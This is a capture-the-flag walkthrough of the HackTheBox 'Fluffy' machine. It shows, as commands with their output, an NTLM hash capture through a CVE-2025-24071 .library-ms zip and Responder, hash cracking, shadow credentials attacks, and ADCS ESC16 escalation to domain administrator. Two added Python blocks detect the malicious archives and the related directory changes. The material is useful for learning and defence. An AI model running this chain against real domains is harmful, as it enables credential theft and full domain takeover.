HTB Fluffy - Easy

Getting user hash via CVE-2025-24071, shadow credentials attack, and ADCS ESC16 privilege escalation

This machine involved capturing a user's NTLM hash through a known Windows exploit (CVE-2025-24071), performing a shadow credentials attack against service accounts, and finally exploiting an ADCS ESC16 misconfiguration to obtain administrator access.

# RECONNAISSANCE

Nmap Scan

```
PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Simple DNS Plus
88/tcp   open  kerberos-sec Microsoft Windows Kerberos
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: fluffy.htb)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap     Microsoft Windows Active Directory LDAP
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP
3269/tcp open  ssl/globalcatLDAPssl?
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
```

Added domain fluffy.htb to /etc/hosts. Provided with default credentials: j.fleischman:J0elTHEM4n1990!

SMB Enumeration

```
$ smbclient.py fluffy.htb/j.fleischman:'**********'@fluffy.htb
  Sharename       Type      Comment
  -----           ----      -------
  ADMIN$          Disk      Remote Admin
  C$              Disk      Default share
  IPC$            IPC       Remote IPC
  IT              Disk      IT Department Files
  NETLOGON        Disk      Logon server share
  SYSVOL          Disk      Logon server share
```

The IT share stood out as the only non-default share. Downloaded its files with the get command.

Found Critical Vulnerability

In Upgrade_Notice.pdf, found references to CVE-2025-24071 - a spoofing vulnerability in Windows File Explorer that allows capturing NTLM hashes via malicious .library-ms files.

# USER - CVE-2025-24071 Exploitation

NTLM Hash Capture

```
# Run exploit to generate malicious zip
$ python3 CVE-2025-24071.py
[+] Generated malicious.zip with embedded SMB path

# Upload to IT share
$ smbclient //fluffy.htb/IT -U j.fleischman
smb: \> put malicious.zip

# Start Responder to capture hashes
$ sudo responder -I tun0 -dwv
[SMB] NTLMv2-SSP Hash: p.agila::FLUFFY:1122334455667788:ABC123...:010100...
```
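From the defender's side, the archive dropped on the IT share is detectable before anyone opens it: a .library-ms file is a small XML document whose library location should never point at a remote host. The scanner below is an added example written for this writeup, not part of the original page or of the CVE PoC; the archive it scans is constructed in-memory test data (the UNC host is a documentation-range address), and the element names come from Microsoft's Library Description schema.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Namespace of the Windows Library Description schema used by .library-ms files.
LIB_NS = "{http://schemas.microsoft.com/windows/2009/library}"
# A library location that leaves the box: a UNC path (\\host\...) or a file://host/... URL.
REMOTE_LOCATION = re.compile(r"^(\\\\[^\\]+|file://[^/])", re.IGNORECASE)

# Minimal .library-ms skeleton, used only to build the constructed test samples below.
LIBRARY_TEMPLATE = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">'
    "<searchConnectorDescriptionList><searchConnectorDescription>"
    "<simpleLocation><url>{url}</url></simpleLocation>"
    "</searchConnectorDescription></searchConnectorDescriptionList></libraryDescription>"
)

def remote_library_urls(library_ms: bytes) -> list[str]:
    """Return every <url> in a .library-ms document that points at a remote host."""
    root = ET.fromstring(library_ms)
    urls = [u.text.strip() for u in root.iter(f"{LIB_NS}url") if u.text]
    return [u for u in urls if REMOTE_LOCATION.match(u)]

def scan_archive(data: bytes) -> list[tuple[str, str]]:
    """Report (member, url) for each .library-ms member of a ZIP whose location is remote.
    An unparseable library file is reported as well, since it still reaches Explorer."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(".library-ms"):
                continue
            try:
                findings += [(name, u) for u in remote_library_urls(zf.read(name))]
            except ET.ParseError:
                findings.append((name, "<unparseable .library-ms>"))
    return findings

def build_sample_zip(url: str, member: str = "docs/Upgrade.library-ms") -> bytes:
    """Constructed sample archive (test data only): one library file pointing at `url`."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(member, LIBRARY_TEMPLATE.format(url=url))
    return buf.getvalue()

if __name__ == "__main__":
    # 203.0.113.0/24 is a documentation range, not a real host.
    print(scan_archive(build_sample_zip(r"\\203.0.113.10\share")))      # one finding
    print(scan_archive(build_sample_zip(r"C:\Users\Public\Documents")))  # []
```

Run it over uploads to file shares or mail attachments; a local path such as C:\Users\Public or file:///C:/... is allowed, while any \\host or file://host location is flagged.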

Hash Cracking

```
$ hashcat -m 5600 p.agila.hash rockyou.txt
p.agila::FLUFFY:...:**********
```

Recovered password: **********

BloodHound Analysis

Evil-WinRM failed for p.agila, so ran BloodHound to map attack paths:

```
$ bloodhound-python -u 'p.agila' -p '**********' -d fluffy.htb -ns 10.10.11.40 -c all

# Ingest into BloodHound
$ neo4j start
$ bloodhound

[*] p.agila → Service Account Managers (GenericAll)
[*] Service Accounts → GenericWrite on ca_svc, winrm_svc, ldap_svc
[*] winrm_svc → Remote Management Users
```

Shadow Credentials Attack

```
# Add p.agila to Service Accounts
$ net rpc group addmem "Service Accounts" "p.agila" -U fluffy/p.agila

# Perform shadow credentials attack on winrm_svc
$ certipy shadow auto -u p.agila@fluffy.htb -p '**********' -account winrm_svc
[*] Certificate saved to winrm_svc.pfx
[*] NTLM Hash: 7f3c456e8a9b1c2d3e4f567890abcdef

# Connect via Evil-WinRM
$ evil-winrm -i fluffy.htb -u winrm_svc -H 7f3c456e8a9b1c2d3e4f567890abcdef
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> type user.txt
HTB{****************}
```

Lateral Movement to ca_svc

```
# Perform shadow credentials on ca_svc
$ certipy shadow auto -u p.agila@fluffy.htb -p '**********' -account ca_svc
[*] Got NT hash: 9d4e5f678a1b2c3d4e5f678901234abc
```

# ROOT - ADCS ESC16 Exploitation

Certificate Services Enumeration

```
$ certipy find -u ca_svc@fluffy.htb -hashes :9d4e5f678a1b2c3d4e5f678901234abc
[*] Certificate Authorities
    fluffy-DC01-CA
    [!] ESC16: Security extension disabled globally on CA

[*] Vulnerable Templates Found:
    - User (ESC16 exploitable)
```

ESC16 Attack Chain

Following the Certipy ESC16 methodology, temporarily change the UPN of ca_svc to administrator, request a certificate while the UPN points at that account, then restore it:

```
# Update UPN to administrator
$ certipy account update -u ca_svc@fluffy.htb -hashes :9d4e5f678a1b2c3d4e5f678901234abc \
  -user ca_svc -upn administrator

# Request certificate
$ certipy req -u ca_svc@fluffy.htb -hashes :9d4e5f678a1b2c3d4e5f678901234abc \
  -ca fluffy-DC01-CA -template User
[*] Certificate saved to ca_svc.pfx

# Set Kerberos cache
$ export KRB5CCNAME=ca_svc.ccache

# Revert UPN back
$ certipy account update -u ca_svc@fluffy.htb -hashes :9d4e5f678a1b2c3d4e5f678901234abc \
  -user ca_svc -upn ca_svc@fluffy.htb
```

Administrator Access

```
# Authenticate as administrator
$ certipy auth -pfx ca_svc.pfx -dc-ip 10.10.11.40
[*] Using principal: administrator@fluffy.htb
[*] Got NT hash: a1b2c3d4e5f67890a1b2c3d4e5f67890

# Connect as administrator
$ evil-winrm -i fluffy.htb -u administrator -H a1b2c3d4e5f67890a1b2c3d4e5f67890
*Evil-WinRM* PS C:\Users\Administrator\Desktop> whoami
fluffy\administrator

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
HTB{****************}
```

# KEY LEARNINGS

  • #CVE-2025-24071: Windows File Explorer vulnerability allows NTLM hash capture via malicious .library-ms files embedded in archives
  • #Shadow Credentials: GenericWrite permissions allow adding alternate credentials to user objects for Kerberos authentication
  • #ESC16: Security extension disabled on CA allows UPN modification to impersonate any user via certificate requests
  • #BloodHound: Essential for mapping AD relationships and identifying privilege escalation paths through group memberships
  • #Defense: Enable security extensions on CA, implement LDAP signing, restrict GenericWrite permissions, monitor certificate requests
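Both privilege steps in this chain leave the same kind of trace on the DC: a directory write that shows up as Event ID 5136 (directory service object modified), first on msDS-KeyCredentialLink during the shadow credentials step, then on userPrincipalName during the ESC16 UPN swap. The triage below is an added example written for this writeup, not part of the original page; it assumes the "Audit Directory Service Changes" subcategory is enabled and a SACL covers the affected attributes, and the 5136 events it consumes are constructed samples that mirror the writes shown above.

```python
import xml.etree.ElementTree as ET

EVT_NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"
VALUE_ADDED = "%%14674"  # Event 5136 OperationType code for "Value Added"
WATCHED = {"msDS-KeyCredentialLink": "shadow credentials: key credential added",
           "userPrincipalName": "UPN rewritten to another account name (ESC16 setup)"}

def parse_5136(xml_text: str) -> dict:
    """Flatten the EventData fields of a 5136 (directory object modified) event."""
    root = ET.fromstring(xml_text)
    return {d.get("Name"): (d.text or "") for d in root.iter(f"{EVT_NS}Data")}

def triage(events, pki_admins=frozenset()):
    """Return (actor, objectDN, attribute, reason) for suspicious attribute writes.
    Key-credential writes by known device-enrollment principals are ignored."""
    alerts = []
    for ev in map(parse_5136, events):
        attr = ev.get("AttributeLDAPDisplayName", "")
        if attr not in WATCHED or ev.get("OperationType") != VALUE_ADDED:
            continue
        actor, dn = ev.get("SubjectUserName", ""), ev.get("ObjectDN", "")
        if attr == "userPrincipalName":
            new_name = ev.get("AttributeValue", "").split("@")[0].lower()
            own_name = dn.split(",")[0].removeprefix("CN=").lower()
            if new_name == own_name:
                continue  # UPN still names the object itself: routine change
        elif actor.lower() in pki_admins:
            continue
        alerts.append((actor, dn, attr, WATCHED[attr]))
    return alerts

def sample_5136(actor, dn, attr, value, op=VALUE_ADDED) -> str:
    """Constructed 5136 event carrying only the fields the triage reads (test data)."""
    fields = {"SubjectUserName": actor, "ObjectDN": dn, "AttributeLDAPDisplayName": attr,
              "AttributeValue": value, "OperationType": op}
    data = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in fields.items())
    return (f'<Event xmlns="{EVT_NS[1:-1]}"><System><EventID>5136</EventID></System>'
            f"<EventData>{data}</EventData></Event>")

USERS = "CN=Users,DC=fluffy,DC=htb"
SAMPLE_EVENTS = [  # constructed, mirroring the writes this walkthrough performs
    sample_5136("p.agila", f"CN=winrm_svc,{USERS}", "msDS-KeyCredentialLink", "B:828:BLOB:CN=winrm_svc"),
    sample_5136("ca_svc", f"CN=ca_svc,{USERS}", "userPrincipalName", "ca_svc@fluffy.htb", op="%%14675"),
    sample_5136("ca_svc", f"CN=ca_svc,{USERS}", "userPrincipalName", "administrator"),
    sample_5136("ca_svc", f"CN=ca_svc,{USERS}", "userPrincipalName", "ca_svc@fluffy.htb"),
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

A UPN change is logged as a Value Deleted event followed by a Value Added event, so only the added value is examined; the revert back to ca_svc@fluffy.htb is not alerted, which is why the original UPN rewrite, not the cleanup, is the signal to hunt for.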

# ROAHACKS - HTB Fluffy Easy Windows Machine | Published: November 27, 2025